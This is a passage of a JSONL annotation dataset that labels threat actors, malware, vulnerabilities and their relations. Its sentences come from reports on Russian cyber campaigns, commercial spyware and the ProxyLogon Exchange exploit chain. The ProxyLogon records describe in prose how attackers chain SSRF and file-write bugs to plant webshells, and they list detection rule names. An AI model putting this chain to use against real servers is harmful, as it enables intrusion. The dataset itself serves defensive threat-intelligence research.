applications.","entities":[{"id":50318,"label":"SOFTWARE","start_offset":13,"end_offset":32},{"id":50319,"label":"SOFTWARE","start_offset":70,"end_offset":77}],"relations":[],"Comments":[]} {"id":4521,"text":"Although our security precautions are robust, security issues can still occur, which is why we created a comprehensive security response process to respond to incidents.","entities":[],"relations":[],"Comments":[]} {"id":4522,"text":"Google manages a vulnerability rewards program (VRP), rewarding researchers millions of dollars for their contributions in securing our devices and platforms.","entities":[{"id":50320,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4523,"text":"We also provide research grants to security researchers to help fund and support the research community.","entities":[],"relations":[],"Comments":[]} {"id":4524,"text":"This is all part of a larger strategy to keep Google products and users, as well as the Internet at large more secure.","entities":[{"id":50321,"label":"identity","start_offset":46,"end_offset":52}],"relations":[],"Comments":[]} {"id":4525,"text":"Project Zero is also a critical component of this strategy, pushing transparency and more timely patching of vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":4526,"text":"Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations – in other words, the users who are frequently targeted by surveillance tools.","entities":[],"relations":[],"Comments":[]} {"id":4527,"text":"Google developed Project Shield, a free protection against distributed denial of service (DDoS) attacks, to protect news media and human rights organization websites.","entities":[{"id":50323,"label":"attack-pattern","start_offset":59,"end_offset":95},{"id":50322,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4528,"text":"We recently expanded eligibility to protect Ukraine government organizations, and we are currently protecting over 200 Ukraine websites today.","entities":[{"id":50324,"label":"identity","start_offset":44,"end_offset":76},{"id":50325,"label":"location","start_offset":119,"end_offset":126}],"relations":[],"Comments":[]} {"id":4529,"text":"To protect high risk user accounts, we offer the Advanced Protection Program (APP), which is our highest form of account security.","entities":[],"relations":[],"Comments":[]} {"id":4530,"text":"APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing.","entities":[{"id":50326,"label":"attack-pattern","start_offset":116,"end_offset":147}],"relations":[],"Comments":[]} {"id":4531,"text":" We believe it is time for government, industry and civil society to come together to change the incentive structure which has allowed these technologies to spread in secret.","entities":[],"relations":[],"Comments":[]} {"id":4532,"text":"The first step is to understand the scope of the problem.","entities":[],"relations":[],"Comments":[]} {"id":4533,"text":"We appreciate the Committee’s focus on this issue, and recommend the U.S. Intelligence Community prioritize identifying and analyzing threats from foreign commercial spyware providers as being on par with other major advanced threat actors.","entities":[{"id":50327,"label":"identity","start_offset":69,"end_offset":96}],"relations":[],"Comments":[]} {"id":4535,"text":"The U.S. could also set an example to other governments by reviewing and disclosing its own historical use of these tools.","entities":[{"id":50329,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} {"id":4536,"text":"We welcome recent steps taken by the government in applying sanctions to the NSO Group and Candiru, and we believe other governments should consider expanding these restrictions.","entities":[{"id":50330,"label":"threat-actor","start_offset":77,"end_offset":86},{"id":50331,"label":"threat-actor","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} {"id":4537,"text":"Additionally, the U.S. government should consider a full ban on Federal procurement of commercial spyware technologies and contemplate imposing further sanctions to limit spyware vendors’ ability to operate in the U.S. and receive U.S. investment.","entities":[{"id":50332,"label":"identity","start_offset":18,"end_offset":33},{"id":50333,"label":"location","start_offset":214,"end_offset":218},{"id":50334,"label":"location","start_offset":231,"end_offset":235}],"relations":[],"Comments":[]} {"id":4538,"text":"The harms from this industry are amply evident by this point, and we believe they outweigh any benefit to continued use.","entities":[],"relations":[],"Comments":[]} {"id":4540,"text":"Any one government’s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.","entities":[],"relations":[],"Comments":[]} {"id":4541,"text":"Google is investing heavily as a company and as an industry to counter serious threats to our users.","entities":[{"id":50336,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4542,"text":"In the modern world, we must be able to trust the devices we use every day and ensure that foreign adversaries do not have access to sophisticated exploits.","entities":[],"relations":[],"Comments":[]} {"id":4543,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} {"id":4544,"text":"Google is committed to leading the industry in detecting and disrupting these threats.","entities":[{"id":50337,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":4545,"text":"I thank the Committee for this attention on this critical issue.","entities":[],"relations":[],"Comments":[]} {"id":4546,"text":"Google’s Threat Analysis Group (TAG) continues to closely monitor the cybersecurity environment in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":50338,"label":"identity","start_offset":0,"end_offset":36},{"id":50339,"label":"location","start_offset":99,"end_offset":113},{"id":50340,"label":"location","start_offset":140,"end_offset":147}],"relations":[],"Comments":[]} {"id":4547,"text":"Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same.","entities":[{"id":50344,"label":"location","start_offset":153,"end_offset":160},{"id":50342,"label":"location","start_offset":62,"end_offset":69},{"id":50343,"label":"threat-actor","start_offset":121,"end_offset":132},{"id":50346,"label":"threat-actor","start_offset":5,"end_offset":36}],"relations":[{"id":943,"from_id":50346,"to_id":50342,"type":"targets"}],"Comments":[]} {"id":4548,"text":"TAG continues to disrupt campaigns from multiple sets of Russian government-backed attackers, some of which are detailed in our previous updates.","entities":[{"id":50347,"label":"identity","start_offset":0,"end_offset":3},{"id":50348,"label":"threat-actor","start_offset":57,"end_offset":92}],"relations":[],"Comments":[]} {"id":4549,"text":"Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin.","entities":[{"id":50351,"label":"threat-actor","start_offset":179,"end_offset":203},{"id":50349,"label":"location","start_offset":82,"end_offset":89},{"id":50350,"label":"identity","start_offset":94,"end_offset":97},{"id":50352,"label":"threat-actor","start_offset":210,"end_offset":233},{"id":50353,"label":"identity","start_offset":253,"end_offset":256}],"relations":[{"id":944,"from_id":50351,"to_id":50349,"type":"targets"},{"id":945,"from_id":50352,"to_id":50349,"type":"targets"}],"Comments":[]} {"id":4551,"text":"Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.","entities":[{"id":50355,"label":"identity","start_offset":48,"end_offset":51},{"id":50356,"label":"threat-actor","start_offset":88,"end_offset":93},{"id":50357,"label":"identity","start_offset":135,"end_offset":165},{"id":50358,"label":"location","start_offset":126,"end_offset":132},{"id":50359,"label":"SOFTWARE","start_offset":183,"end_offset":190},{"id":50360,"label":"identity","start_offset":221,"end_offset":244}],"relations":[{"id":946,"from_id":50356,"to_id":50357,"type":"attributed-to"},{"id":947,"from_id":50357,"to_id":50358,"type":"located-at"},{"id":948,"from_id":50357,"to_id":50360,"type":"impersonates"}],"Comments":[]} {"id":4552,"text":"This is the first known instance of Turla distributing Android-related malware.","entities":[{"id":50361,"label":"threat-actor","start_offset":36,"end_offset":41},{"id":50362,"label":"SOFTWARE","start_offset":55,"end_offset":62}],"relations":[{"id":949,"from_id":50361,"to_id":50362,"type":"targets"}],"Comments":[]} {"id":4553,"text":"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.","entities":[{"id":50363,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} {"id":4554,"text":"We believe there was no major impact on Android users and that the number of installs was miniscule.","entities":[{"id":50364,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} {"id":4555,"text":"The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites.","entities":[{"id":50365,"label":"attack-pattern","start_offset":53,"end_offset":76}],"relations":[],"Comments":[]} {"id":4556,"text":"However, the 'DoS' consists only of a single GET request to the target website, not enough to be effective.","entities":[{"id":50366,"label":"attack-pattern","start_offset":14,"end_offset":17}],"relations":[],"Comments":[]} {"id":4557,"text":"The list of target websites for the app can be seen in the CyberChef recipe here.","entities":[{"id":50367,"label":"SOFTWARE","start_offset":59,"end_offset":68}],"relations":[],"Comments":[]} {"id":4558,"text":"During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.","entities":[{"id":50370,"label":"TIME","start_offset":116,"end_offset":126},{"id":50368,"label":"malware","start_offset":34,"end_offset":54},{"id":50369,"label":"SOFTWARE","start_offset":78,"end_offset":85},{"id":50371,"label":"attack-pattern","start_offset":156,"end_offset":159},{"id":50372,"label":"location","start_offset":176,"end_offset":183}],"relations":[{"id":950,"from_id":50368,"to_id":50369,"type":"targets"}],"Comments":[]} {"id":4559,"text":"In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro.","entities":[{"id":50373,"label":"SOFTWARE","start_offset":18,"end_offset":25},{"id":50375,"label":"malware","start_offset":52,"end_offset":68},{"id":50376,"label":"DOMAIN","start_offset":107,"end_offset":118},{"id":50374,"label":"malware","start_offset":39,"end_offset":50}],"relations":[],"Comments":[]} {"id":4560,"text":"This app is quite different from the Turla apps described above and written by a different developer.","entities":[{"id":50377,"label":"threat-actor","start_offset":37,"end_offset":42}],"relations":[],"Comments":[]} {"id":4561,"text":"It also downloads a list of targets from an external site, but unlike the Turla apps, it continually sends requests to the target websites until it is stopped by the user.","entities":[{"id":50378,"label":"threat-actor","start_offset":74,"end_offset":79}],"relations":[],"Comments":[]} {"id":4562,"text":"Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.","entities":[{"id":50379,"label":"malware","start_offset":43,"end_offset":54},{"id":50380,"label":"threat-actor","start_offset":130,"end_offset":142},{"id":50381,"label":"malware","start_offset":160,"end_offset":177}],"relations":[{"id":951,"from_id":50381,"to_id":50380,"type":"authored-by"}],"Comments":[]} {"id":4563,"text":"Indicators: The Follina vulnerability (CVE-2022-30190), first disclosed in late May, received significant usage from both APT and cybercrime groups throughout June after it was patched by Microsoft.","entities":[{"id":50382,"label":"vulnerability","start_offset":16,"end_offset":54},{"id":50383,"label":"TIME","start_offset":75,"end_offset":83},{"id":50384,"label":"TIME","start_offset":159,"end_offset":163},{"id":50385,"label":"identity","start_offset":188,"end_offset":197}],"relations":[],"Comments":[]} {"id":4564,"text":"Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).","entities":[{"id":50386,"label":"vulnerability","start_offset":13,"end_offset":54},{"id":50387,"label":"SOFTWARE","start_offset":62,"end_offset":110}],"relations":[{"id":952,"from_id":50387,"to_id":50386,"type":"has"}],"Comments":[]} {"id":4565,"text":"Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.","entities":[{"id":50390,"label":"identity","start_offset":35,"end_offset":38},{"id":50389,"label":"identity","start_offset":16,"end_offset":23},{"id":50391,"label":"identity","start_offset":57,"end_offset":68},{"id":50392,"label":"threat-actor","start_offset":78,"end_offset":83},{"id":50394,"label":"vulnerability","start_offset":132,"end_offset":153},{"id":50393,"label":"threat-actor","start_offset":88,"end_offset":96}],"relations":[{"id":956,"from_id":50393,"to_id":50391,"type":"attributed-to"},{"id":953,"from_id":50393,"to_id":50394,"type":"exploits"},{"id":954,"from_id":50392,"to_id":50394,"type":"exploits"},{"id":955,"from_id":50392,"to_id":50391,"type":"attributed-to"}],"Comments":[]} {"id":4566,"text":"The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.","entities":[{"id":50395,"label":"campaign","start_offset":4,"end_offset":21},{"id":50396,"label":"attack-pattern","start_offset":27,"end_offset":58},{"id":50397,"label":"SOFTWARE","start_offset":76,"end_offset":92},{"id":50398,"label":"location","start_offset":177,"end_offset":184}],"relations":[{"id":957,"from_id":50395,"to_id":50396,"type":"uses"},{"id":958,"from_id":50395,"to_id":50397,"type":"targets"}],"Comments":[]} {"id":4567,"text":"TAG has also observed an increasing number of financially motivated actors targeting Ukraine.","entities":[{"id":50399,"label":"identity","start_offset":0,"end_offset":3},{"id":50400,"label":"location","start_offset":85,"end_offset":92}],"relations":[],"Comments":[]} {"id":4568,"text":"One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine.","entities":[{"id":50401,"label":"identity","start_offset":44,"end_offset":51},{"id":50402,"label":"threat-actor","start_offset":55,"end_offset":63},{"id":50403,"label":"vulnerability","start_offset":103,"end_offset":118},{"id":50404,"label":"identity","start_offset":169,"end_offset":197}],"relations":[{"id":959,"from_id":50402,"to_id":50404,"type":"impersonates"},{"id":960,"from_id":50402,"to_id":50403,"type":"uses"}],"Comments":[]} {"id":4569,"text":"We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.","entities":[{"id":50405,"label":"threat-actor","start_offset":97,"end_offset":102},{"id":50406,"label":"malware","start_offset":137,"end_offset":158}],"relations":[{"id":961,"from_id":50405,"to_id":50406,"type":"uses"}],"Comments":[]} {"id":4570,"text":"Ghostwriter\/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.","entities":[{"id":50408,"label":"threat-actor","start_offset":12,"end_offset":19},{"id":50407,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":50409,"label":"location","start_offset":50,"end_offset":57},{"id":50410,"label":"location","start_offset":138,"end_offset":144}],"relations":[{"id":962,"from_id":50408,"to_id":50407,"type":"duplicate-of"},{"id":963,"from_id":50407,"to_id":50409,"type":"attributed-to"},{"id":964,"from_id":50408,"to_id":50409,"type":"attributed-to"},{"id":965,"from_id":50408,"to_id":50410,"type":"targets"},{"id":966,"from_id":50407,"to_id":50410,"type":"targets"}],"Comments":[]} {"id":4571,"text":"They continue to use the 'Browser in the Browser' phishing technique that TAG first observed and described in March.","entities":[{"id":50413,"label":"TIME","start_offset":110,"end_offset":115},{"id":50411,"label":"attack-pattern","start_offset":26,"end_offset":68},{"id":50412,"label":"identity","start_offset":74,"end_offset":77}],"relations":[],"Comments":[]} {"id":4572,"text":"An example of this technique, used to target Facebook users, can be seen in the screenshot below.","entities":[{"id":50414,"label":"SOFTWARE","start_offset":45,"end_offset":53}],"relations":[],"Comments":[]} {"id":4573,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[{"id":50416,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50415,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50417,"label":"attack-pattern","start_offset":88,"end_offset":119}],"relations":[{"id":967,"from_id":50416,"to_id":50415,"type":"duplicate-of"},{"id":968,"from_id":50415,"to_id":50417,"type":"uses"}],"Comments":[]} {"id":4574,"text":"In addition to including phishing links directly in the email, the attackers also link to PDFs and\/or DOCs, hosted on Google Drive and Microsoft One Drive, that contain a link to an attacker-controlled phishing domain.","entities":[{"id":50420,"label":"SOFTWARE","start_offset":118,"end_offset":130},{"id":50419,"label":"attack-pattern","start_offset":25,"end_offset":39},{"id":50421,"label":"SOFTWARE","start_offset":135,"end_offset":154}],"relations":[],"Comments":[]} {"id":4576,"text":"These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.","entities":[],"relations":[],"Comments":[]} {"id":4577,"text":"Recently observed COLDRIVER indicators: In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike.","entities":[{"id":50428,"label":"tools","start_offset":257,"end_offset":270},{"id":50424,"label":"identity","start_offset":71,"end_offset":78},{"id":50425,"label":"threat-actor","start_offset":82,"end_offset":90},{"id":50427,"label":"SOFTWARE","start_offset":204,"end_offset":219},{"id":50423,"label":"threat-actor","start_offset":18,"end_offset":27},{"id":50426,"label":"identity","start_offset":136,"end_offset":175}],"relations":[{"id":969,"from_id":50423,"to_id":50425,"type":"duplicate-of"},{"id":970,"from_id":50423,"to_id":50426,"type":"impersonates"}],"Comments":[]} {"id":4578,"text":"In just two days, the volume observed and categorized as spam by Gmail exceeded 4,500 emails.","entities":[{"id":50429,"label":"SOFTWARE","start_offset":65,"end_offset":70}],"relations":[],"Comments":[]} {"id":4580,"text":"Last March it seemed the world came to a stand-still as the COVID-19 pandemic begin to rapidly spread.","entities":[{"id":50431,"label":"TIME","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} {"id":4581,"text":"While businesses, sporting events, and schools started shutting down, cybercriminals remained active as ever.","entities":[],"relations":[],"Comments":[]} {"id":4582,"text":"In 2020, the Trend Micro Zero Day Initiative™ (ZDI) published 1,453 advisories, the most ever in the history of the program.","entities":[{"id":50433,"label":"identity","start_offset":13,"end_offset":51},{"id":50432,"label":"TIME","start_offset":3,"end_offset":7}],"relations":[],"Comments":[]} {"id":4583,"text":"More startling is the fact that 18.6% of all disclosures were published without a fix from the vendor—another record-breaking stat.","entities":[],"relations":[],"Comments":[]} {"id":4584,"text":" As ZDI predicted, 2021 continued to be a busy year.","entities":[{"id":50434,"label":"identity","start_offset":4,"end_offset":7},{"id":50435,"label":"TIME","start_offset":19,"end_offset":23}],"relations":[],"Comments":[]} {"id":4585,"text":"In March 2021, Microsoft kicked off the patch cycle early after releasing an advisory regarding the mass exploitation of four zero-days vulnerabilities by a Chinese Hacking group, HAFNIUM, on the on-premises versions of the Microsoft Exchange Server.","entities":[{"id":50436,"label":"TIME","start_offset":3,"end_offset":13},{"id":50437,"label":"identity","start_offset":15,"end_offset":24},{"id":50438,"label":"vulnerability","start_offset":126,"end_offset":151},{"id":50439,"label":"threat-actor","start_offset":180,"end_offset":187},{"id":50440,"label":"location","start_offset":157,"end_offset":164},{"id":50441,"label":"SOFTWARE","start_offset":196,"end_offset":249}],"relations":[{"id":971,"from_id":50439,"to_id":50440,"type":"located-at"},{"id":972,"from_id":50439,"to_id":50438,"type":"exploits"},{"id":973,"from_id":50441,"to_id":50438,"type":"has"}],"Comments":[]} {"id":4586,"text":"In the following days of the attack, Trend Micro reported that at least 30,000 organizations were thought to have been attacked in the US, and 63,000 servers remained exposed to these exploits.","entities":[{"id":50443,"label":"location","start_offset":135,"end_offset":137},{"id":50442,"label":"identity","start_offset":37,"end_offset":48}],"relations":[],"Comments":[]} {"id":4587,"text":" The vulnerability has been dubbed as ProxyLogon by the researchers at DEVCORE, who are credited with finding the bugs in the proxy architecture and the logon mechanism of Exchange.","entities":[{"id":50446,"label":"SOFTWARE","start_offset":172,"end_offset":180},{"id":50444,"label":"vulnerability","start_offset":38,"end_offset":48},{"id":50445,"label":"identity","start_offset":71,"end_offset":78}],"relations":[{"id":974,"from_id":50446,"to_id":50444,"type":"has"}],"Comments":[]} {"id":4588,"text":"DEVCORE reported two of the four zero-days (CVE-2021-26855 and CVE-2021-27065) to Microsoft Security Response Center (MSRC).","entities":[{"id":50447,"label":"identity","start_offset":0,"end_offset":7},{"id":50448,"label":"vulnerability","start_offset":44,"end_offset":58},{"id":50449,"label":"vulnerability","start_offset":63,"end_offset":77},{"id":50450,"label":"identity","start_offset":82,"end_offset":123}],"relations":[],"Comments":[]} {"id":4589,"text":"On March 2, Volexity reported in-the-wild exploitation of the vulnerabilities, to which DEVCORE confirmed that the exploit observed by Volexity was the one submitted to MSRC.","entities":[{"id":50451,"label":"TIME","start_offset":3,"end_offset":10},{"id":50452,"label":"identity","start_offset":12,"end_offset":20},{"id":50453,"label":"identity","start_offset":88,"end_offset":95},{"id":50454,"label":"identity","start_offset":135,"end_offset":143},{"id":50455,"label":"identity","start_offset":169,"end_offset":173}],"relations":[],"Comments":[]} {"id":4590,"text":"Since then, there has been opportunistic exploitation by various threat actors and ransomware groups (Dearcry, BlackKingdom) since majority of Outlook Web App portals are public and indexed by search engines like Google Search, Shodan, Binaryedge, Censys, Zoomeye etc.","entities":[{"id":50458,"label":"SOFTWARE","start_offset":143,"end_offset":158},{"id":50459,"label":"SOFTWARE","start_offset":213,"end_offset":226},{"id":50461,"label":"SOFTWARE","start_offset":236,"end_offset":246},{"id":50462,"label":"SOFTWARE","start_offset":248,"end_offset":254},{"id":50456,"label":"threat-actor","start_offset":102,"end_offset":109},{"id":50457,"label":"threat-actor","start_offset":111,"end_offset":123},{"id":50463,"label":"SOFTWARE","start_offset":256,"end_offset":263},{"id":50460,"label":"SOFTWARE","start_offset":228,"end_offset":234}],"relations":[],"Comments":[]} {"id":4591,"text":"According to Shodan, on March 4, there were more than 266,000 Exchange Servers vulnerable to the ProxyLogon vulnerability, a day after the patch was released.","entities":[{"id":50465,"label":"TIME","start_offset":24,"end_offset":31},{"id":50464,"label":"identity","start_offset":13,"end_offset":19},{"id":50466,"label":"SOFTWARE","start_offset":62,"end_offset":78},{"id":50467,"label":"vulnerability","start_offset":97,"end_offset":121}],"relations":[{"id":976,"from_id":50466,"to_id":50467,"type":"has"}],"Comments":[]} {"id":4592,"text":" Fig - Shodan Results ","entities":[{"id":50468,"label":"SOFTWARE","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} {"id":4593,"text":"In lieu of these exploits, let’s take a look at how Trend Micro Vision One™ and Trend Micro Cloud One™ can provide protection against two of the four zero-days, CVE-2021-26855 and CVE-2021-27065.","entities":[{"id":50469,"label":"SOFTWARE","start_offset":52,"end_offset":75},{"id":50470,"label":"SOFTWARE","start_offset":80,"end_offset":102},{"id":50471,"label":"vulnerability","start_offset":161,"end_offset":175},{"id":50472,"label":"vulnerability","start_offset":180,"end_offset":194}],"relations":[],"Comments":[]} {"id":4594,"text":"Overview:","entities":[],"relations":[],"Comments":[]} {"id":4595,"text":"Two bugs are chained to achieve the remote code execution and for the attack to be successful, an attacker requires access to the Outlook Web App portal of the vulnerable Exchange Server, and a valid email address","entities":[{"id":50473,"label":"SOFTWARE","start_offset":130,"end_offset":145},{"id":50474,"label":"SOFTWARE","start_offset":171,"end_offset":186}],"relations":[],"Comments":[]} {"id":4596,"text":" CVE-2021-26855: Microsoft Exchange Server Remote Code Execution Vulnerability (pre-authenticated Server-Side Request Forgery [SSRF]) CVE-2021-27065: Microsoft Exchange Server Remote Code Execution Vulnerability (post-authenticated Arbitrary File Write) Fig - MS Exchange Client Access Protocol Architecture The Client Access services (Outlook Web App portal) proxies the incoming connections to the Backend services.","entities":[{"id":50475,"label":"vulnerability","start_offset":3,"end_offset":17},{"id":50478,"label":"vulnerability","start_offset":152,"end_offset":213},{"id":50476,"label":"vulnerability","start_offset":19,"end_offset":80},{"id":50477,"label":"vulnerability","start_offset":136,"end_offset":150}],"relations":[{"id":977,"from_id":50476,"to_id":50475,"type":"duplicate-of"},{"id":978,"from_id":50478,"to_id":50477,"type":"duplicate-of"}],"Comments":[]} {"id":4597,"text":"As per the Exchange documentation, clients don’t directly connect to the backend services.","entities":[{"id":50479,"label":"SOFTWARE","start_offset":11,"end_offset":19}],"relations":[],"Comments":[]} {"id":4598,"text":"But because of the SSRF vulnerability, attackers can query the internal backend services and APIs on the Exchange Server, bypassing the frontend proxy.","entities":[{"id":50481,"label":"SOFTWARE","start_offset":105,"end_offset":120},{"id":50480,"label":"vulnerability","start_offset":19,"end_offset":37}],"relations":[],"Comments":[]} {"id":4599,"text":"By abusing the SSRF, attackers can create session IDs and access tokens for privileged accounts with the context of the Exchange Control Panel, which can be used to write files with attacker-controlled content at a location on the target server, chosen by the attacker.","entities":[{"id":50482,"label":"attack-pattern","start_offset":15,"end_offset":19},{"id":50483,"label":"SOFTWARE","start_offset":120,"end_offset":128}],"relations":[],"Comments":[]} {"id":4600,"text":"Since Exchange depends on Internet Information Services (IIS) webserver, an attacker can write ASPX webshells and run arbitrary commands as SYSTEM on the Exchange Server. In January 2021, we came across extensive use of Chopper ASPX webshells in targeted attacks by malicious actors to establish persistence and a foothold on the public-facing Outlook Web App servers. Trend Micro Cloud One™ – Workload Security Correlation:","entities":[{"id":50484,"label":"SOFTWARE","start_offset":6,"end_offset":14},{"id":50487,"label":"malware","start_offset":95,"end_offset":109},{"id":50489,"label":"malware","start_offset":221,"end_offset":243},{"id":50490,"label":"SOFTWARE","start_offset":345,"end_offset":360},{"id":50491,"label":"SOFTWARE","start_offset":372,"end_offset":394},{"id":50485,"label":"SOFTWARE","start_offset":26,"end_offset":61},{"id":50486,"label":"SOFTWARE","start_offset":154,"end_offset":169},{"id":50488,"label":"TIME","start_offset":175,"end_offset":187}],"relations":[],"Comments":[]} {"id":4601,"text":"Trend Micro Cloud One™ – Workload Security is a cloud-native solution that provides automated security via powerful APIs.","entities":[{"id":50492,"label":"SOFTWARE","start_offset":0,"end_offset":22}],"relations":[],"Comments":[]} {"id":4602,"text":"Security as code allows DevOps teams to bake security into their build pipeline to release continuously and frequently, so developers like yourself, can keep working without disruption from security.","entities":[],"relations":[],"Comments":[]} {"id":4603,"text":"Workload Security uses advanced security controls such as intrusion prevention system (IPS), deep packet inspection (DPI), and integrity monitoring to protect Exchange Servers from attackers that could exploit ProxyLogon.","entities":[{"id":50494,"label":"SOFTWARE","start_offset":159,"end_offset":175},{"id":50493,"label":"vulnerability","start_offset":210,"end_offset":220}],"relations":[{"id":979,"from_id":50494,"to_id":50493,"type":"has"}],"Comments":[]} {"id":4604,"text":"The following detection rules safeguard a vulnerable Exchange Server from the CVEs reported: Intrusion Prevention System detections: 1010854 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855) 1010868 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) 1010870 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) – 1 1007170 - Identified Suspicious China Chopper Webshell Communication (ATT&CK T1100) 1005934 - Identified Suspicious Command Injection Attack Integrity Monitoring detections: 1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities 1010854 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855) 1007170 - Identified Suspicious China Chopper Webshell Communication (ATT&CK T1100) 1010870 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1 1005934 - Identified Suspicious Command Injection Attack ","entities":[{"id":50495,"label":"SOFTWARE","start_offset":53,"end_offset":68},{"id":50496,"label":"vulnerability","start_offset":147,"end_offset":225},{"id":50497,"label":"vulnerability","start_offset":236,"end_offset":314},{"id":50498,"label":"vulnerability","start_offset":325,"end_offset":403},{"id":50501,"label":"vulnerability","start_offset":664,"end_offset":742},{"id":50499,"label":"threat-actor","start_offset":615,"end_offset":622},{"id":50500,"label":"malware","start_offset":780,"end_offset":802},{"id":50502,"label":"vulnerability","start_offset":847,"end_offset":925}],"relations":[],"Comments":[]} {"id":4605,"text":"IM Rules: 1010855 - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities Trend Micro Vision One™ Correlation: Fig - Microsoft Exchange Server RCE Vulnerability (CVE-2021-26855 + CVE-2021-27065) Trend Micro Vision One™ is a purpose-built, threat defense platform with extended detection and response (XDR) capabilities that work to prevent majority of attacks with automated protection.","entities":[{"id":50505,"label":"SOFTWARE","start_offset":83,"end_offset":106},{"id":50504,"label":"threat-actor","start_offset":46,"end_offset":53},{"id":50507,"label":"SOFTWARE","start_offset":213,"end_offset":236},{"id":50506,"label":"vulnerability","start_offset":131,"end_offset":208},{"id":50503,"label":"SOFTWARE","start_offset":25,"end_offset":43}],"relations":[],"Comments":[]} {"id":4606,"text":"The solution allows you to see more and respond faster by collecting and correlating data across email, endpoints, servers, cloud workloads, and networks.","entities":[],"relations":[],"Comments":[]} {"id":4607,"text":" Using the Trend Micro Vision One Workbench, you can easily see what threats were detected, attack techniques, and a prioritized list of risky devices and users.","entities":[{"id":50508,"label":"SOFTWARE","start_offset":11,"end_offset":43}],"relations":[],"Comments":[]} {"id":4608,"text":"With Trend Micro Vision One, we ran a public proof of concept (PoC) available online exploiting the ProxyLogon vulnerability.","entities":[{"id":50509,"label":"SOFTWARE","start_offset":5,"end_offset":27},{"id":50510,"label":"vulnerability","start_offset":100,"end_offset":124}],"relations":[],"Comments":[]} {"id":4609,"text":"The above image shows the vulnerability detected and all the assets related to the alert for further investigation.","entities":[],"relations":[],"Comments":[]} {"id":4610,"text":"Let’s take a deeper look:","entities":[],"relations":[],"Comments":[]} {"id":4611,"text":" Fig - Potential Chopper Webshell Detection","entities":[{"id":50511,"label":"malware","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} {"id":4612,"text":" The Potential Chopper Webshell Execution model triggers when the web shell is already present on the machine and is being used as a backdoor to run commands as SYSTEM on the Exchange Server using China Chopper. The metrics provided by this model should be investigated carefully, since the ProxyLogon zero-day vulnerability was exploited in-the-wild, before Microsoft addressed the issue publicly.","entities":[{"id":50512,"label":"malware","start_offset":18,"end_offset":34},{"id":50514,"label":"malware","start_offset":200,"end_offset":213},{"id":50515,"label":"vulnerability","start_offset":295,"end_offset":328},{"id":50513,"label":"SOFTWARE","start_offset":178,"end_offset":193},{"id":50516,"label":"identity","start_offset":363,"end_offset":372}],"relations":[],"Comments":[]} {"id":4613,"text":"Microsoft has since taken things a step further by creating patches for out-of-support versions of Exchange.","entities":[{"id":50517,"label":"identity","start_offset":0,"end_offset":9},{"id":50518,"label":"SOFTWARE","start_offset":99,"end_offset":107}],"relations":[],"Comments":[]} {"id":4614,"text":"Overall, Microsoft released patches for 89 unique CVEs in March—14 of which were listed as Critical and 75 listed as Important in 